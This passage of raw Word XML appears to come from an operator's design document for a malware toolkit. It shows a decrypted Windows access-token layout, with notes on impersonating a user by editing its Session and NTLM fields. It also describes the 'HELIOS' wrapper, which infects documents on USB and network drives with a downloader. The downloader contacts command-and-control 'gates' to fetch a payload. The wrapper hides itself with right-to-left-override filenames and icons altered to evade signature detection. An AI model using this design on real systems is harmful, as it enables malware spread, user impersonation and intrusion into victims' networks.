      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>84</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007B0610  00490041  A.I.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>88</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lastRenderedPageBreak/>
        <w:t>007B0614  0000004E  N...</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>92</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007B0618  00490057  W.I.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>96</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Pointed to by the DWORD at offset 12. User name</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007B061C  0037004E  N.7.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>100</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007B0620  00450054  T.E.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>104</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007B0624  00540053  S.T.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>108</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007B0628  00000024  $...</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>112</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A320AF" w:rsidRPr="00A320AF" w:rsidRDefault="00A320AF" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>007B062C  00000000  ....</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>116</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A320AF" w:rsidRDefault="00A320AF" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A320AF" w:rsidRDefault="00A320AF" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A320AF" w:rsidRDefault="00A320AF" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">In this instance, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will notice a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zero'd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> NTLM field. This implies that the token is probably a local session, which is unrecognized by the domain authority. It is sufficient to impersonate a user by modifying the Session and NTLM fields.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A320AF" w:rsidRDefault="00A320AF" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A320AF" w:rsidRDefault="00A320AF" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">The username and domain name varies per implementation, but generally the token cannot exceed 0x70 bytes in size. The user name is always a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wchar_t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> string</w:t>
      </w:r>
      <w:r w:rsidR="00390A19">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>pointed by:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A320AF" w:rsidRDefault="00A320AF" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001E73AA" w:rsidRDefault="00A320AF" w:rsidP="00B060B1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wchar_t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> *)((</w:t>
      </w:r>
      <w:r w:rsidR="001925E6">
        <w:t>DWORD_PTR</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>decrypted_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + *(PDWORD)((</w:t>
      </w:r>
      <w:r w:rsidR="001925E6">
        <w:t>DWORD_PTR</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>decrypted_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + 0x0c))</w:t>
      </w:r>
      <w:r w:rsidR="001925E6">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D30361" w:rsidRDefault="00D30361" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc347394091"/>
      <w:r>
        <w:t>HELIOS USB Wrapper</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidR="00D30361" w:rsidRDefault="00D30361" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D30361" w:rsidRDefault="00D30361" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>The Wrapper was designed for network infiltration through removable devices and network drives. HELIOS targets a variety of file extensions including (but not limited to) PDF, DOCX/DOC, PPTX/PPT, etc. Each target file will be "wrapped" with a PE downloader, used to propagate the Mercury payload.</w:t>
      </w:r>
      <w:r w:rsidR="001E73AA">
        <w:t xml:space="preserve"> Upon execution, the downloader will register with the gates, encoded in the PE.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007115ED" w:rsidRDefault="007115ED" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Combining both social engineering tricks and technical implementation, the HELIOS Wrapper will prove to be a useful tool in network infiltration. The "Wrapped" target looks and acts like a regular file. For example, infecting a PDF will create an executable with the appropriate PDF icons, and it will launch the associated program once run.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007115ED" w:rsidRDefault="007115ED" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Documents that require editing, such as DOC, must be granted "permissive" status on the PE. So if a user clicks it, the PE will delete itself, and unpack the original payload for editing. The HELIOS DLL will continue to monitor such activity, and allow </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reinfection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> once the file lock has been closed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E73AA" w:rsidRDefault="001E73AA" w:rsidP="001E73AA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc347394092"/>
      <w:r>
        <w:t>High-Level Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="001E73AA" w:rsidRDefault="001E73AA" w:rsidP="001E73AA"/>
    <w:p w:rsidR="001E73AA" w:rsidRDefault="001E73AA" w:rsidP="001E73AA">
      <w:r>
        <w:tab/>
        <w:t>Getting the Wrapper to function requires several steps, although these procedures may be managed by the Corona panel.</w:t>
      </w:r>
      <w:r w:rsidR="007115ED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E73AA" w:rsidRDefault="001E73AA" w:rsidP="001E73AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Build the primary HELIOS binaries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E73AA" w:rsidRDefault="001E73AA" w:rsidP="001E73AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Build </w:t>
      </w:r>
      <w:r w:rsidR="00222028">
        <w:t>Wrapper template</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00222028" w:rsidRDefault="00222028" w:rsidP="00222028">
      <w:r>
        <w:t>Once a client is infected, the Wrapper follows the following procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00222028" w:rsidRDefault="00222028" w:rsidP="00222028">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Download the Wrapper template</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00222028" w:rsidRDefault="00BB5A17" w:rsidP="00222028">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Find USB/Network drives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB5A17" w:rsidRDefault="00BB5A17" w:rsidP="00222028">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Infect files based on:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB5A17" w:rsidRDefault="007D386D" w:rsidP="00BB5A17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Has the file been modified or access within the last </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> days?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D386D" w:rsidRDefault="007D386D" w:rsidP="00BB5A17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>What is the probability of infecting the file?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D386D" w:rsidRDefault="007D386D" w:rsidP="007D386D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Add the following social engineering tricks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D386D" w:rsidRDefault="007D386D" w:rsidP="007D386D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>RTO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D386D" w:rsidRDefault="007D386D" w:rsidP="007D386D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Datetime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> append</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D386D" w:rsidRDefault="007D386D" w:rsidP="007D386D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>PIF extension</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D386D" w:rsidRDefault="007D386D" w:rsidP="007D386D">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">The original file is appended to the End-of-File (EOF) data at the end of the Wrapper template.  Once the file is executed, the EOF data is extracted and started using its respective program. The downloader sends a notification to the </w:t>
      </w:r>
      <w:r w:rsidR="00D5113F">
        <w:t>gate tracking system, and then requests a payload. Either a payload will be received, or it will fail. Either way, the file will delete itself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030686A" w:rsidRDefault="0030686A" w:rsidP="007D386D"/>
    <w:p w:rsidR="00D5113F" w:rsidRDefault="00D5113F" w:rsidP="00D5113F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc347394093"/>
      <w:r>
        <w:t>Right-to-Left Override (RTO)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="00D5113F" w:rsidRDefault="00D5113F" w:rsidP="00D5113F"/>
    <w:p w:rsidR="00D5113F" w:rsidRDefault="00D5113F" w:rsidP="00D5113F">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003F649D">
        <w:t xml:space="preserve">RTO is a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F649D">
        <w:t>unicode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F649D">
        <w:t xml:space="preserve"> character that reverses the reading order of Arabic characters. The RTO can also be used for any language, effectively reversing the order of the string. For example, if the string is '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F649D">
        <w:t>abcd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F649D">
        <w:t>', and the RTO character is installed before 'a', then the string will read '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F649D">
        <w:t>dcba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F649D">
        <w:t xml:space="preserve">'. This trick is useful in mangling file name extensions. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F649D" w:rsidRDefault="003F649D" w:rsidP="00D5113F">
      <w:r>
        <w:t>No RTO character applied:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F649D" w:rsidRDefault="003F649D" w:rsidP="00D5113F">
      <w:r>
        <w:tab/>
        <w:t>rogue.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F649D" w:rsidRDefault="003F649D" w:rsidP="00D5113F">
      <w:r>
        <w:t>A fake extension included:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F649D" w:rsidRDefault="003F649D" w:rsidP="00D5113F">
      <w:r>
        <w:tab/>
        <w:t>roguefdp.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F649D" w:rsidRDefault="003F649D" w:rsidP="00D5113F">
      <w:r>
        <w:t>Now, the RTO character is installed before the 'f' character to produce:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F649D" w:rsidRDefault="003F649D" w:rsidP="00D5113F">
      <w:r>
        <w:tab/>
        <w:t>rogueexe.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F649D" w:rsidRDefault="003F649D" w:rsidP="00D5113F">
      <w:r>
        <w:tab/>
        <w:t>In the previous example, a user that has disabled extension hiding in Explorer will see the .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> extension. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C7420" w:rsidRDefault="009C7420" w:rsidP="00D5113F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>790575</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>259080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3648710" cy="657225"/>
            <wp:effectExtent l="19050" t="0" r="8890" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="-113" y="0"/>
                <wp:lineTo x="-113" y="21287"/>
                <wp:lineTo x="21653" y="21287"/>
                <wp:lineTo x="21653" y="0"/>
                <wp:lineTo x="-113" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1" name="Picture 0" descr="LMsPo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Po3d.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3648710" cy="657225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Example with extension hiding:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C7420" w:rsidRPr="00D5113F" w:rsidRDefault="009C7420" w:rsidP="00D5113F"/>
    <w:p w:rsidR="00D30361" w:rsidRDefault="00D30361" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C7420" w:rsidRDefault="009C7420" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>790575</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>313055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3714750" cy="647700"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="-111" y="0"/>
                <wp:lineTo x="-111" y="20965"/>
                <wp:lineTo x="21600" y="20965"/>
                <wp:lineTo x="21600" y="0"/>
                <wp:lineTo x="-111" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="2" name="Picture 1" descr="Nlluz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luzKY.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3714750" cy="647700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Example without extension hiding:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C7420" w:rsidRDefault="009C7420" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D10F0B" w:rsidRDefault="00D10F0B" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C7420" w:rsidRDefault="009C7420" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D10F0B" w:rsidRDefault="009C7420" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1838325</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>196215</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1428750" cy="1257300"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="-288" y="0"/>
                <wp:lineTo x="-288" y="21273"/>
                <wp:lineTo x="21600" y="21273"/>
                <wp:lineTo x="21600" y="0"/>
                <wp:lineTo x="-288" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="3" name="Picture 2" descr="3GRpU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RpUvH.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1428750" cy="1257300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C7420" w:rsidRDefault="009C7420" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D10F0B" w:rsidRDefault="00D10F0B" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C7420" w:rsidRDefault="009C7420" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C7420" w:rsidRDefault="009C7420" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC5922" w:rsidRDefault="00CC5922" w:rsidP="00CC5922">
      <w:r>
        <w:t>An option exists to also append "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>datetime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" to the end of the extension:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC5922" w:rsidRDefault="00CC5922" w:rsidP="00CC5922">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>895350</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>195580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3667760" cy="666750"/>
            <wp:effectExtent l="19050" t="0" r="8890" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="4" name="Picture 3" descr="bQQSU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QQSUQU.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3667760" cy="666750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC5922" w:rsidRPr="00CC5922" w:rsidRDefault="00CC5922" w:rsidP="00CC5922"/>
    <w:p w:rsidR="00CC5922" w:rsidRDefault="00CC5922" w:rsidP="009C7420">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC5922" w:rsidRDefault="00CC5922" w:rsidP="009C7420">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC5922" w:rsidRDefault="00CC5922" w:rsidP="009C7420">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C7420" w:rsidRDefault="009C7420" w:rsidP="009C7420">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc347394094"/>
      <w:r>
        <w:t>Wrapper Icons</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="009C7420" w:rsidRDefault="009C7420" w:rsidP="009C7420"/>
    <w:p w:rsidR="009C7420" w:rsidRDefault="009C7420" w:rsidP="00CC5922">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>As can be seen in the previous examples, an icon is used in the PE file to represent the document type that it is mimicking. The icons were designed to work in all views, and to support all OSs. The icon packs themselves are all high quality, but have been slightly modified to prevent signature detection in the resource segments.</w:t>
      </w:r>
    </w:p>
